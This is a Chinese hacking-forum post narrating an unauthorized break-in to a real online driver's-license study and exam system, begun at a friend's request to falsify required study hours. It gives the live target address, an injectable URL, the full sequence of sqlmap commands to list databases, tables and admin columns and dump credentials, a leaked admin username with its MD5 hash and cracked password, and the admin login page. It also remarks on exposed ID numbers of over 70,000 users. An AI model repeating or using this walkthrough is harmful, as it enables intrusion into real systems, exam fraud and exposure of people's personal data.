HanDs
管理员

[入侵交流] 一个二货的求助导致驾驶员在线学习驾照考试系统的沦陷 





学习中请遵循国家相关法律法规,黑客不作恶。没有网络安全就没有国家安全

本站需要登陆后才能查看

 11点多突然接到一个二货的求助,这2货就是FGG。对,没错就是他。(FGG是他网名,自称“风哥哥”,不过大家都称他为“风公公”)好了步入正题!

       这货发来一个网址 http://221.193.212.49:8184/ygweb/index.jsp ;问我能不能搞到管理员账号,好像必须要在线看题看够多少小时才能考试,想用管理员账号直接改时间。

       网站是JSP的 首先想到的是struts2漏洞 一直很火,拿这洞在乌云刷rank的人也不少,不过大部分现在都补了。这个网站也补了,感觉搞不下了,突然发现了一处注入点,扭转局势了!

       注入点:http://221.193.212.49:8184/ygweb/loginAction.do?Flag=look&guid=45c676a2-d7c4-48e3-8f99-3e004c6c72dc

       对于注入点直接上大杀器 Sqlmap.

       开工:

爆数据库

./sqlmap.py -u “http://221.193.212.49:8184/ygweb/loginAction.do?Flag=look&guid=45c676a2-d7c4-48e3-8f99-3e004c6c72dc”  --dbs

111

爆数据表

./sqlmap.py -u “http://221.193.212.49:8184/ygweb/loginAction.do?Flag=look&guid=45c676a2-d7c4-48e3-8f99-3e004c6c72dc” -D web --tables

222

爆管理表的列名

./sqlmap.py -u “http://221.193.212.49:8184/ygweb/loginAction.do?Flag=look&guid=45c676a2-d7c4-48e3-8f99-3e004c6c72dc” -D web -T AdminUser --columns

333

爆管理员账号密码

./sqlmap.py -u “http://221.193.212.49:8184/ygweb/loginAction.do?Flag=look&guid=45c676a2-d7c4-48e3-8f99-3e004c6c72dc” -D web -T AdminUser -C userName,passWord --dump

444

爆出来3条管理员的账号与密码,我们拿一个去登陆后台 ,密码加密了,先去解下MD5。

8a8bb7cd343aa2ad99b7d762030857a2 superman

555

解得密码为a1

后台地址: http://221.193.212.49:8184/ygweb/login.jsp 成功登陆

PS:进后台之后发现有题库而且可以修改正确答案, 如果把考试题正确答案改了会有多少人通过不了! 或者把所有答案都统一了是不是通过so easy!所以影响还是很重大的!看到还有个学时查询 看到了7W+用户 ,身份证姓名侧漏!

55

 

66

 

 虽然成功搞定了这系统 但对于改数据还是放弃吧,这2货也不敢改。做个好人吧,最后把这洞提交到乌云了顺便换点WB兑换点礼物吧! 


学习中请遵守法律法规,本网站内容均来自于互联网,本网站不负担法律责任
一个二 求助 导致 驾驶员 在线学习 驾照 考试 系统 沦陷
#1楼
发帖时间:2016-7-23   |   查看数:0   |   回复数:0
游客组
快速回复